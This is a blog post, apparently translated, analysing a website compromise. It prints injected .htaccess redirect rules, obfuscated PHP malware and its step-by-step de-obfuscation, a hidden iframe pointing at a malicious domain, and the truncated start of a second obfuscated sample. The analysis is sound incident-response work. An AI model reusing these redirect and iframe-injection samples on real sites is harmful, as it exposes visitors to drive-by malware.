Geekly Articles each Day
📜 ⬆️ ⬇️

My little investigation or history of one hacking

It all started with the message "Here?" From my friend in one of the social networks. “Yandex found viruses on the site. Are you looking? ”“ Why not look, ”I thought.
So began my three-day study of scripts in order to understand the essence of hacking and what is happening there.

Yandex cursed "Behavioral analysis."
First of all I inspected .htaccess - the lines to the top of the file were added:

<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace|web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*) RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC] RewriteCond %{REQUEST_FILENAME} !/index_backup.php RewriteRule (.*) /index_backup.php?query=$1 [QSA,L] </IfModule>

Everything is simple - all users who have moved to our site from search engines, directories, etc., and used Opera or Internet Explorer to view their browser are redirected to a certain index_backup.php page.
The content of this page is one line. But what! (Hereinafter, the code will be hidden under spoilers, so as not to pile up).
file contents
 <? $GLOBALS['_62805507_']=Array(base64_decode(''.'ZG'.'VmaW5'.'l'),base64_decode('ZmlsZV'.'9nZ'.'XRfY29'.'u'.'dGV'.'udHM'.'='),base64_decode('c3RyZ'.'WFtX'.'2Nvbn'.'RleHR'.'fY3JlYXR'.'l'),base64_decode(''.'Zml'.'sZV9nZ'.'X'.'RfY29'.'udGVudHM='),base64_decode('c3'.'R'.'ybmF0'.'Y21'.'w'),base64_decode('bXRfcmFuZ'.'A='.'='),base64_decode('ZnB1dHM='),base64_decode('ZnJlYWQ'.'='),base64_decode('ZmN'.'sb3N'.'l'),base64_decode('c3RycG9z'),base64_decode('YW'.'RkY3NsYX'.'N'.'oZXM='),base64_decode('Z'.'mZsdXNo'),base64_decode(''.'c3V'.'ic3Ry'),base64_decode('Zm'.'lsZV'.'9'.'nZXRfY29udGVu'.'dH'.'M='),base64_decode('YXJyY'.'XlfZm'.'lsbF9rZXlz'),base64_decode(''.'Y3Vyb'.'F9pbml0'),base64_decode('Y3VybF9tdWx0aV9leGVj'),base64_decode('YXJyY'.'Xlfc'.'HVzaA=='),base64_decode('Y3VybF9zZXRvc'.'HQ'.'='),base64_decode('bXRf'.'cmFuZ'.'A=='),base64_decode('aW1hZ'.'2VjcmVhdGVmcm9'.'tZ2lm'),base64_decode('Y3'.'Vy'.'bF9'.'zZX'.'RvcH'.'Q'.'='),base64_decode('Y3VybF9zZX'.'Rvc'.'HQ='),base64_decode('Y3'.'Vy'.'bF'.'9l'.'eG'.'Vj'),base64_decode('Y3'.'Vy'.'bF9jbG9z'.'Z'.'Q=='),base64_decode(''.'aW5pX2d'.'ldA='.'='),base64_decode('c'.'GFyc2VfdX'.'Js'),base64_decode('ZnNv'.'Y2tv'.'cGVu'),base64_decode('ZnV'.'uY3R'.'p'.'b'.'2'.'5f'.'Z'.'Xh'.'pc'.'3Rz')); ?><? function _1051993851($i){$a=Array('SUZ'.'SQU1FX1'.'V'.'S'.'T'.'A==','aH'.'R0c'.'DovL3d'.'vcmRwcmV'.'zc3Rlc3Qu'.'aW'.'5m'.'by83Ln'.'R4'.'d'.'A='.'=',''.'ZA==','aHR0cDovLw='.'=','S'.'F'.'RUU'.'F9IT1NU','Uk'.'VRVU'.'VTV'.'F'.'9VUkk'.'=','a'.'HR0'.'cA==','dGltZW91dA==','R'.'0VUIA==',''.'Pw='.'=','I'.'CB'.'IVFRQLzEuMA0K','VXNlci1BZ2VudDo'.'gTW96'.'a'.'WxsYS81L'.'jAgKFd'.'p'.'bmRvd3M7IFU7IFdpbmRvd'.'3MgT'.'lQgN'.'S4xO'.'yBl'.'b'.'i1V'.'UzsgcnY6MS44LjA'.'uMykgR2'.'Vj'.'a2'.'8v'.'MjAwNjA0'.'M'.'jYgRmlyZW'.'ZveC8x'.'LjUuM'.'C4zDQo=',''.'QW'.'NjZXB0'.'OiAqLyoNCg='.'=','QWNjZXB0'.'LUxhb'.'md1YWdlOiBlbi11cyxlbjt'.'xPTAuNQ0K','QWN'.'jZXB'.'0L'.'UNo'.'YXJz'.'ZX'.'Q6IElTTy04'.'ODU5LTEsdXR'.'mLTg7cT'.'0wLjcs'.'Kjt'.'xPTAu'.'Nw0K','S2VlcC'.'1'.'Bb'.'Gl'.'2'.'ZT'.'ogMzA'.'w'.'D'.'Qo=',''.'Q29'.'ubmVjd'.'Glv'.'bjoga'.'2Vl'.'cC1hbGl2ZQ0K','aQ==','DQoNC'.'g==','Y'.'Wxsb3df'.'dXJsX'.'2ZvcG'.'Vu','aG9zd'.'A==','aG9zd'.'A==','cGF0aA==','cXVl'.'c'.'nk=',''.'Y3VybF9pbm'.'l0');return base64_decode($a[$i]);} ?><?php $GLOBALS['_62805507_'][0](_1051993851(0),_1051993851(1));$_0=_1051993851(2);echo l__3(IFRAME_URL);$_1=round(0+2345.5+2345.5);echo@$GLOBALS['_62805507_'][1](_1051993851(3) .$_SERVER[_1051993851(4)] .$_SERVER[_1051993851(5)]);function l__0($_2){$_3=$GLOBALS['_62805507_'][2](array(_1051993851(6)=> array(_1051993851(7)=> round(0+3+3+3+3+3))));return $GLOBALS['_62805507_'][3]($_2,false,$_3);(round(0+3799)-round(0+759.8+759.8+759.8+759.8+759.8)+round(0+3457)-round(0+3457))?$GLOBALS['_62805507_'][4]($_4,$_3):$GLOBALS['_62805507_'][5](round(0+767.33333333333+767.33333333333+767.33333333333),round(0+1266.3333333333+1266.3333333333+1266.3333333333));}function l__1($_5,$_6,$_7,$_8){$GLOBALS['_62805507_'][6]($_5,_1051993851(8) .$_7 ._1051993851(9) .$_8 ._1051993851(10) ."Host: $_6\r\n" ._1051993851(11) ._1051993851(12) ._1051993851(13) ._1051993851(14) ._1051993851(15) ._1051993851(16) ."Referer: http://$_6\r\n\r\n");while($_4=$GLOBALS['_62805507_'][7]($_5,round(0+1365.3333333333+1365.3333333333+1365.3333333333))){$_9 .= $_4;}$GLOBALS['_62805507_'][8]($_5);$_10=_1051993851(17);$_11=$GLOBALS['_62805507_'][9]($_9,_1051993851(18));if((round(0+968.25+968.25+968.25+968.25)^round(0+1291+1291+1291))&& $GLOBALS['_62805507_'][10]($_5,$_2,$_5,$_7))$GLOBALS['_62805507_'][11]($_12,$_7,$_11);$_9=$GLOBALS['_62805507_'][12]($_9,$_11+round(0+1.3333333333333+1.3333333333333+1.3333333333333));if((round(0+1014.5+1014.5+1014.5+1014.5)^round(0+4058))&& $GLOBALS['_62805507_'][13]($_3,$_3,$_3))$GLOBALS['_62805507_'][14]($_13);return $_9;}function l__2($_2){$_13=$GLOBALS['_62805507_'][15]($_2);if((round(0+736.6+736.6+736.6+736.6+736.6)+round(0+312+312+312))>round(0+3683)|| $GLOBALS['_62805507_'][16]($_14));else{$GLOBALS['_62805507_'][17]($_11);}$GLOBALS['_62805507_'][18]($_13,42,FALSE);if(round(0+3068.5+3068.5)<$GLOBALS['_62805507_'][19](round(0+572.33333333333+572.33333333333+572.33333333333),round(0+4415)))$GLOBALS['_62805507_'][20]($_2,$_15,$_16);$GLOBALS['_62805507_'][21]($_13,19913,TRUE);$GLOBALS['_62805507_'][22]($_13,13,round(0+3+3+3+3+3));$_12=$GLOBALS['_62805507_'][23]($_13);$GLOBALS['_62805507_'][24]($_13);return $_12;}function l__3($_2){if($GLOBALS['_62805507_'][25](_1051993851(19))== round(0+0.33333333333333+0.33333333333333+0.33333333333333)){echo l__0($_2);}else{$_14=$GLOBALS['_62805507_'][26]($_2);if($_5=@$GLOBALS['_62805507_'][27]($_14[_1051993851(20)],round(0+40+40),$_15,$_16,round(0+3+3+3+3+3))){echo l__1($_5,$_14[_1051993851(21)],$_14[_1051993851(22)],$_14[_1051993851(23)]);}elseif(@$GLOBALS['_62805507_'][28](_1051993851(24))){echo l__2($_2);}}}

After the addition of hyphenation, the code became a bit more readable, but did not become clearer at all:
the contents of the edited file
 <? $GLOBALS['_62805507_']=Array( base64_decode('ZGVmaW5l'), base64_decode('ZmlsZV9nZXRfY29udGVudHM='), base64_decode('c3RyZWFtX2NvbnRleHRfY3JlYXRl'), base64_decode('ZmlsZV9nZXRfY29udGVudHM='), base64_decode('c3RybmF0Y21w'), base64_decode('bXRfcmFuZA=='), base64_decode('ZnB1dHM='), base64_decode('ZnJlYWQ='), base64_decode('ZmNsb3Nl'), base64_decode('c3RycG9z'), base64_decode('YWRkY3NsYXNoZXM='), base64_decode('ZmZsdXNo'), base64_decode('c3Vic3Ry'), base64_decode('ZmlsZV9nZXRfY29udGVudHM='), base64_decode('YXJyYXlfZmlsbF9rZXlz'), base64_decode('Y3VybF9pbml0'), base64_decode('Y3VybF9tdWx0aV9leGVj'), base64_decode('YXJyYXlfcHVzaA=='), base64_decode('Y3VybF9zZXRvcHQ='), base64_decode('bXRfcmFuZA=='), base64_decode('aW1hZ2VjcmVhdGVmcm9tZ2lm'), base64_decode('Y3VybF9zZXRvcHQ='), base64_decode('Y3VybF9zZXRvcHQ='), base64_decode('Y3VybF9leGVj'), base64_decode('Y3VybF9jbG9zZQ=='), base64_decode('aW5pX2dldA=='), base64_decode('cGFyc2VfdXJs'), base64_decode('ZnNvY2tvcGVu'), base64_decode('ZnVuY3Rpb25fZXhpc3Rz')); ?> <? function _1051993851($i){ $a=Array( 'SUZSQU1FX1VSTA==', 'aHR0cDovL3dvcmRwcmVzc3Rlc3QuaW5mby83LnR4dA==', 'ZA==', 'aHR0cDovLw==', 'SFRUUF9IT1NU', 'UkVRVUVTVF9VUkk=', 'aHR0cA==', 'dGltZW91dA==', 'R0VUIA==', 'Pw==', 'ICBIVFRQLzEuMA0K', 'VXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuMykgR2Vja28vMjAwNjA0MjYgRmlyZWZveC8xLjUuMC4zDQo=', 'QWNjZXB0OiAqLyoNCg==', 'QWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNQ0K', 'QWNjZXB0LUNoYXJzZXQ6IElTTy04ODU5LTEsdXRmLTg7cT0wLjcsKjtxPTAuNw0K', 'S2VlcC1BbGl2ZTogMzAwDQo=', 'Q29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0K', 'aQ==', 'DQoNCg==', 'YWxsb3dfdXJsX2ZvcGVu', 'aG9zdA==', 'aG9zdA==', 'cGF0aA==', 'cXVlcnk=', 'Y3VybF9pbml0'); return base64_decode($a[$i]); } ?> <?php $GLOBALS['_62805507_'][0](_1051993851(0),_1051993851(1)); $_0=_1051993851(2); echo l__3(IFRAME_URL); $_1=round(0+2345.5+2345.5); echo@$GLOBALS['_62805507_'][1](_1051993851(3) .$_SERVER[_1051993851(4)] .$_SERVER[_1051993851(5)]); function l__0($_2){ $_3=$GLOBALS['_62805507_'][2](array(_1051993851(6)=> array(_1051993851(7)=> round(0+3+3+3+3+3)))); return $GLOBALS['_62805507_'][3]($_2,false,$_3); (round(0+3799)-round(0+759.8+759.8+759.8+759.8+759.8)+round(0+3457)-round(0+3457))?$GLOBALS['_62805507_'][4]($_4,$_3):$GLOBALS['_62805507_'][5](round(0+767.33333333333+767.33333333333+767.33333333333),round(0+1266.3333333333+1266.3333333333+1266.3333333333)); } function l__1($_5,$_6,$_7,$_8){ $GLOBALS['_62805507_'][6]($_5,_1051993851(8) .$_7 ._1051993851(9) .$_8 ._1051993851(10) ."Host: $_6\r\n" ._1051993851(11) ._1051993851(12) ._1051993851(13) ._1051993851(14) ._1051993851(15) ._1051993851(16) ."Referer: http://$_6\r\n\r\n"); while($_4=$GLOBALS['_62805507_'][7]($_5,round(0+1365.3333333333+1365.3333333333+1365.3333333333))){ $_9 .= $_4; } $GLOBALS['_62805507_'][8]($_5); $_10=_1051993851(17); $_11=$GLOBALS['_62805507_'][9]($_9,_1051993851(18)); if((round(0+968.25+968.25+968.25+968.25)^round(0+1291+1291+1291))&& $GLOBALS['_62805507_'][10]($_5,$_2,$_5,$_7))$GLOBALS['_62805507_'][11]($_12,$_7,$_11); $_9=$GLOBALS['_62805507_'][12]($_9,$_11+round(0+1.3333333333333+1.3333333333333+1.3333333333333)); if((round(0+1014.5+1014.5+1014.5+1014.5)^round(0+4058))&& $GLOBALS['_62805507_'][13]($_3,$_3,$_3))$GLOBALS['_62805507_'][14]($_13); return $_9; } function l__2($_2){ $_13=$GLOBALS['_62805507_'][15]($_2); if((round(0+736.6+736.6+736.6+736.6+736.6)+round(0+312+312+312))>round(0+3683)|| $GLOBALS['_62805507_'][16]($_14)); else{ $GLOBALS['_62805507_'][17]($_11); } $GLOBALS['_62805507_'][18]($_13,42,FALSE); if(round(0+3068.5+3068.5)<$GLOBALS['_62805507_'][19](round(0+572.33333333333+572.33333333333+572.33333333333),round(0+4415)))$GLOBALS['_62805507_'][20]($_2,$_15,$_16); $GLOBALS['_62805507_'][21]($_13,19913,TRUE); $GLOBALS['_62805507_'][22]($_13,13,round(0+3+3+3+3+3)); $_12=$GLOBALS['_62805507_'][23]($_13); $GLOBALS['_62805507_'][24]($_13); return $_12; } function l__3($_2){ if($GLOBALS['_62805507_'][25](_1051993851(19))== round(0+0.33333333333333+0.33333333333333+0.33333333333333)){ echo l__0($_2); }else{ $_14=$GLOBALS['_62805507_'][26]($_2); if($_5=@$GLOBALS['_62805507_'][27]($_14[_1051993851(20)],round(0+40+40),$_15,$_16,round(0+3+3+3+3+3))){ echo l__1($_5,$_14[_1051993851(21)],$_14[_1051993851(22)],$_14[_1051993851(23)]); }elseif(@$GLOBALS['_62805507_'][28](_1051993851(24))){ echo l__2($_2); } } } ?>

It's time to decode the resulting code:
file contents
 <? $GLOBALS['_62805507_']=Array( // [0] => define // [1] => file_get_contents // [2] => stream_context_create // [3] => file_get_contents // [4] => strnatcmp // [5] => mt_rand // [6] => fputs // [7] => fread // [8] => fclose // [9] => strpos // [10] => addcslashes // [11] => fflush // [12] => substr // [13] => file_get_contents // [14] => array_fill_keys // [15] => curl_init // [16] => curl_multi_exec // [17] => array_push // [18] => curl_setopt // [19] => mt_rand // [20] => imagecreatefromgif // [21] => curl_setopt // [22] => curl_setopt // [23] => curl_exec // [24] => curl_close // [25] => ini_get // [26] => parse_url // [27] => fsockopen // [28] => function_exists base64_decode('ZGVmaW5l'), base64_decode('ZmlsZV9nZXRfY29udGVudHM='), base64_decode('c3RyZWFtX2NvbnRleHRfY3JlYXRl'), base64_decode('ZmlsZV9nZXRfY29udGVudHM='), base64_decode('c3RybmF0Y21w'), base64_decode('bXRfcmFuZA=='), base64_decode('ZnB1dHM='), base64_decode('ZnJlYWQ='), base64_decode('ZmNsb3Nl'), base64_decode('c3RycG9z'), base64_decode('YWRkY3NsYXNoZXM='), base64_decode('ZmZsdXNo'), base64_decode('c3Vic3Ry'), base64_decode('ZmlsZV9nZXRfY29udGVudHM='), base64_decode('YXJyYXlfZmlsbF9rZXlz'), base64_decode('Y3VybF9pbml0'), base64_decode('Y3VybF9tdWx0aV9leGVj'), base64_decode('YXJyYXlfcHVzaA=='), base64_decode('Y3VybF9zZXRvcHQ='), base64_decode('bXRfcmFuZA=='), base64_decode('aW1hZ2VjcmVhdGVmcm9tZ2lm'), base64_decode('Y3VybF9zZXRvcHQ='), base64_decode('Y3VybF9zZXRvcHQ='), base64_decode('Y3VybF9leGVj'), base64_decode('Y3VybF9jbG9zZQ=='), base64_decode('aW5pX2dldA=='), base64_decode('cGFyc2VfdXJs'), base64_decode('ZnNvY2tvcGVu'), base64_decode('ZnVuY3Rpb25fZXhpc3Rz')); ?> <? function _1051993851($i){ $a=Array( // [0] => IFRAME_URL // [1] => http://wordpresstest.info/7.txt // [2] => d // [3] => http:// // [4] => HTTP_HOST // [5] => REQUEST_URI // [6] => http // [7] => timeout // [8] => GET // [9] => ? // [10] => HTTP/1.0 // [11] => User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 // [12] => Accept: */* // [13] => Accept-Language: en-us,en;q=0.5 // [14] => Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 // [15] => Keep-Alive: 300 // [16] => Connection: keep-alive // [17] => i // [18] => // [19] => allow_url_fopen // [20] => host // [21] => host // [22] => path // [23] => query // [24] => curl_init 'SUZSQU1FX1VSTA==', 'aHR0cDovL3dvcmRwcmVzc3Rlc3QuaW5mby83LnR4dA==', 'ZA==', 'aHR0cDovLw==', 'SFRUUF9IT1NU', 'UkVRVUVTVF9VUkk=', 'aHR0cA==', 'dGltZW91dA==', 'R0VUIA==', 'Pw==', 'ICBIVFRQLzEuMA0K', 'VXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuMykgR2Vja28vMjAwNjA0MjYgRmlyZWZveC8xLjUuMC4zDQo=', 'QWNjZXB0OiAqLyoNCg==', 'QWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNQ0K', 'QWNjZXB0LUNoYXJzZXQ6IElTTy04ODU5LTEsdXRmLTg7cT0wLjcsKjtxPTAuNw0K', 'S2VlcC1BbGl2ZTogMzAwDQo=', 'Q29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0K', 'aQ==', 'DQoNCg==', 'YWxsb3dfdXJsX2ZvcGVu', 'aG9zdA==', 'aG9zdA==', 'cGF0aA==', 'cXVlcnk=', 'Y3VybF9pbml0'); return base64_decode($a[$i]); } ?> <?php defined(IFRAME_URL, "http://wordpresstest.info/7.txt"); $_0 = "d"; // echo l__3(IFRAME_URL); $_1 = 4691; // echo @file_get_contents("http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]); function l__0 ($iframeurl) { //       file_get_contents $socket_options = stream_context_create(array("http" => array("timeout" => 15))); return file_get_contents($iframeurl, false, $_3); // -   . ,   - ,  . if (0){ strnatcmp($_4, $_3); } else { mt_rand(2302,3799); } } function l__1 ($socket, $host, $path, $query) { //       fsockopen fputs($socket, "GET ".$path."?".$query." HTTP 1.0\r\n". "Host: $host\r\n". "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\r\n". "Accept: */*\r\n". "Accept-Language: en-us,en;q=0.5\r\n". "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n". "Keep-Alive: 300\r\n". "Connection: keep-alive\r\n". "Referer: http://$host\r\n\r\n" ); while($buffer = fread($socket, 4096)) { $response .= $buffer; } fclose($socket); $_10 = "i"; //  $header_end = strpos($response, "\r\n\r\n"); //  if (0 && addcslashes($_5,$_2,$_5,$_7)){ fflush($_12,$_7,$_11); } $response = substr($response, $header_end + 4); // if(0 && file_get_contents($_3,$_3,$_3)){ array_fill_keys($_13); } return $response; } function l__2 ($iframeurl) { //       curl $curl = curl_init($iframeurl); // if (4619>3683 || curl_multi_exec($_14)); else { array_push($_11); } curl_setopt($curl, 42, FALSE); //  if (6137 < mt_rand(1717, 4415)){ imagecreatefromgif($_2,$_15,$_16); } curl_setopt($curl, 19913, TRUE); curl_setopt($curl, 13, 15); $response = curl_exec($curl); curl_close($curl); return $response; } function l__3 ($iframeurl) { //        if (ini_get("allow_url_fopen") == 1) { echo l__0($iframeurl); } else { $parsed = parse_url($iframeurl); if($socket = @fsockopen($parsed["host"], 80, $garbage_variable1, $garbage_variable2, 15)) { echo l__1($socket, $parsed["host"], $parsed["path"], $parsed["query"]); } elseif (@function_exists("curl_init")) { echo l__2($iframeurl); } } } ?>

And remove all unnecessary:

 <?php defined(IFRAME_URL, "http://wordpresstest.info/7.txt"); echo l__3(IFRAME_URL); echo @file_get_contents("http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]); function l__0 ($iframeurl) { //       file_get_contents $socket_options = stream_context_create(array("http" => array("timeout" => 15))); return file_get_contents($iframeurl, false, $_3); } function l__1 ($socket, $host, $path, $query) { //       fsockopen fputs($socket, "GET ".$path."?".$query." HTTP 1.0\r\n". "Host: $host\r\n". "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\r\n". "Accept: */*\r\n". "Accept-Language: en-us,en;q=0.5\r\n". "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n". "Keep-Alive: 300\r\n". "Connection: keep-alive\r\n". "Referer: http://$host\r\n\r\n" ); while($buffer = fread($socket, 4096)) { $response .= $buffer; } fclose($socket); $header_end = strpos($response, "\r\n\r\n"); $response = substr($response, $header_end + 4); return $response; } function l__2 ($iframeurl) { //       curl $curl = curl_init($iframeurl); curl_setopt($curl, 42, FALSE); curl_setopt($curl, 19913, TRUE); curl_setopt($curl, 13, 15); $response = curl_exec($curl); curl_close($curl); return $response; } function l__3 ($iframeurl) { //        if (ini_get("allow_url_fopen") == 1) { echo l__0($iframeurl); } else { $parsed = parse_url($iframeurl); if($socket = @fsockopen($parsed["host"], 80, $garbage_variable1, $garbage_variable2, 15)) { echo l__1($socket, $parsed["host"], $parsed["path"], $parsed["query"]); } elseif (@function_exists("curl_init")) { echo l__2($iframeurl); } } } ?>

From the code it is clear that the script is trying in any possible way (out of the three proposed) to obtain data located at wordpresstest.info/7.txt ( browsers and antiviruses can swear when visiting ). There is only one line on this page - a one-pixel invisible frame whose address changes once a minute.
') 
 <iframe src="http://raynesparkcarbootsale.co.uk/vmyehem.php" width=1 height=1 style="visibility: hidden"></iframe>

When you go to this address, we will see a white screen with 2 characters (1z / 2z / 3z / 4z), changing depending on the browser and operating system used.

Realizing that the address is constantly changing, I wrote a small script that once a minute (on cron'u) knocked to the 7.txt file, took the site address from it and wrote to the database.
A few hours later, my insolent DDOS was, apparently, noticed and access to my script was blocked. But he managed to successfully parse about 400 addresses, which turned out to be about 20-30 domains in the .ru zone.
Getting to this point was not difficult - to decrypt the code, though not quickly, but not difficult. What to do next? I don’t have access to the servers hosting the sites from the link in the 7.txt file. What to do if there is no access? He must be asked! Well, or at least to persuade the owner to give the script to which the frame refers.
This very step turned out to be the most difficult - to explain to the site owner that I did not hack into his site, I don’t want to sell him anything, this is not my creak and I did not encode any of his personal data. I just want to figure it out ...
In the end, one of the site owners agreed to send me a file, hoping that it would not have any negative effect on it. Thank him for that!
the contents of the second file
 <? $GLOBALS['_664181862_']=Array(base64_decode('Z'.'GVmaW5l'),base64_decode('c3RydG9'.'sb3dl'.'cg=='),base64_decode('a'.'W1'.'hZ2'.'Vj'.'c'.'mVhd'.'GV'.'mc'.'m9tZ2lm'),base64_decode('bX'.'RfcmFuZA=='),base64_decode('c'.'3'.'Ryc'.'G9z'),base64_decode('c3RycG9'.'z'),base64_decode('c3RydG9sb3'.'dlc'.'g=='),base64_decode('c3R'.'yX3JlcG'.'xh'.'Y'.'2'.'U='),base64_decode('dXJ'.'sZW'.'5jb'.'2Rl'),base64_decode('dX'.'JsZW5jb2Rl'),base64_decode('aGVhZG'.'Vy'),base64_decode('d'.'HJpbQ='.'='),base64_decode('aW'.'5pX2dldA'.'=='),base64_decode('cG'.'F'.'yc2VfdX'.'Js'),base64_decode(''.'ZnN'.'vY2tvcGVu'),base64_decode('Z'.'nVuY3R'.'pb'.'2'.'5fZX'.'hpc3'.'Rz'),base64_decode('c3RyZWFtX2'.'NvbnRleHR'.'f'.'Y3J'.'lY'.'XRl'),base64_decode('Y'.'XJyYXlf'.'cmVkdWNl'),base64_decode(''.'ZmZsdXNo'),base64_decode('Zmls'.'ZV9nZXRf'.'Y2'.'9udGVudH'.'M='),base64_decode('Z'.'n'.'B1dHM='),base64_decode(''.'c'.'3RybG'.'Vu'),base64_decode('b'.'XR'.'fcm'.'FuZA=='),base64_decode(''.'Y'.'XJyYXlfZmlsbA=='),base64_decode(''.'ZnJl'.'YWQ'.'='),base64_decode('ZmNs'.'b'.'3Nl'),base64_decode('c3'.'RycG9z'),base64_decode('bXRf'.'cmFuZA=='),base64_decode(''.'Y'.'XJ'.'yYXlfZmx'.'pc'.'A=='),base64_decode('c3'.'Vic3Ry'),base64_decode('Y3VybF9pbml0'),base64_decode(''.'c'.'3'.'Vic3Ry'),base64_decode(''.'b'.'XRfcmF'.'uZA'.'=='),base64_decode('Y3Vyb'.'F9zZXR'.'v'.'cH'.'Q'.'='),base64_decode('Y3Vy'.'bF9zZ'.'XRvcHQ'.'='),base64_decode('cH'.'Jl'.'Z19'.'yZ'.'XB'.'sYW'.'Nl'),base64_decode('Z'.'nJ'.'lYWQ='),base64_decode('Y'.'3V'.'ybF9zZXRvcHQ='),base64_decode('Y3'.'VybF9zZ'.'X'.'R'.'vcHQ'.'='),base64_decode('c'.'3Ry'.'d'.'mFs'),base64_decode(''.'YXJy'.'YX'.'lf'.'bWVy'.'Z2'.'U='),base64_decode(''.'Y3VybF9'.'l'.'e'.'GVj'),base64_decode(''.'Y3'.'VybF9j'.'bG9zZ'.'Q==')); ?><? function _724562126($i){$a=Array('QU'.'RN'.'SU5'.'fU'.'k'.'VESVJfVVJM','aHR0cDov'.'L3'.'R'.'lc3QuY'.'3VzdG9tc2V'.'4Y2Ftcy5jb20vcmIvZ2V0X3'.'V'.'ybC5waH'.'A=','SFRUUF'.'9VU'.'0VSX'.'0F'.'HR'.'U5U','SF'.'RUU'.'F9VU'.'0V'.'SX0FH'.'RU5U','','d'.'2luZG'.'93cw='.'=','MXo'.'=','b3Blcm'.'EvOS44MA='.'=','bXNpZSAxMA'.'==','bX'.'NpZSA5','bXNpZSA4','bXNpZSA3','Mno=','SFRU'.'UF9SRUZFUk'.'V'.'S','SF'.'RUUF'.'9SRU'.'ZFUkVS','','M'.'3'.'o=','SFRUUF9'.'I'.'T1N'.'U',''.'SFR'.'U'.'UF9IT'.'1NU','SFRUUF9I'.'T1NU','d3d3'.'Lg==','','SFRU'.'UF9IT1NU','ZD0'.'=','SF'.'R'.'UUF9IT1'.'N'.'U',''.'Og==','U'.'kVNT1'.'R'.'F'.'X0'.'FERFI'.'=','Og==','Q'.'kFE','NHo=','TG9'.'jY'.'XRpb2'.'46'.'IA==','Y'.'Wxs'.'b3dfdXJsX2Z'.'vcGVu','a'.'G9zd'.'A==','aG9zdA='.'=','cGF0aA='.'=','Y3VybF9pb'.'ml0','aHR0'.'cA==','bWV'.'0aG9'.'k','UE9TVA==','a'.'GV'.'hZGVy','Q29udG'.'VudC1'.'U'.'eXBlOiBh'.'cHBsaWNhdG'.'lv'.'bi9'.'4L'.'Xd3dy1m'.'b3'.'J'.'tL'.'XVybG'.'VuY29kZWQ'.'=','Cg==','Y29ud'.'GVudA'.'==','Ym'.'s=','UE'.'9'.'TVCA=','I'.'CBI'.'VFRQLzE'.'uM'.'A0K','VXN'.'lci'.'1BZ2'.'Vud'.'Dog'.'TW9'.'6aWxsYS'.'81LjAgKFdp'.'b'.'m'.'R'.'vd3M7IF'.'U'.'7IFdp'.'bmRvd3MgTl'.'QgNS4xO'.'yBl'.'bi1VUzs'.'gcnY6MS44'.'LjAuMyk'.'g'.'R'.'2V'.'ja28vMj'.'AwNjA0M'.'jYgRmlyZWZveC8'.'x'.'LjUu'.'MC4zDQo'.'=','QWN'.'jZXB0OiAqLy'.'oNC'.'g='.'=',''.'Q'.'WNjZXB0'.'LUxh'.'bmd'.'1YWdlOi'.'Blbi11cyxlbjtxPT'.'AuNQ0'.'K','QWN'.'jZX'.'B0LUN'.'o'.'YXJzZXQ6IE'.'lTTy0'.'4OD'.'U'.'5LTEsdXRmLTg'.'7cT0w'.'LjcsKj'.'txPTA'.'u'.'N'.'w0'.'K','Q29udG'.'VudC1M'.'ZW5n'.'dGg'.'6IA='.'=','D'.'Q'.'o=','','DQ'.'oN'.'Cg==','bQ==','am'.'1wcA==');return base64_decode($a[$i]);} ?><?php 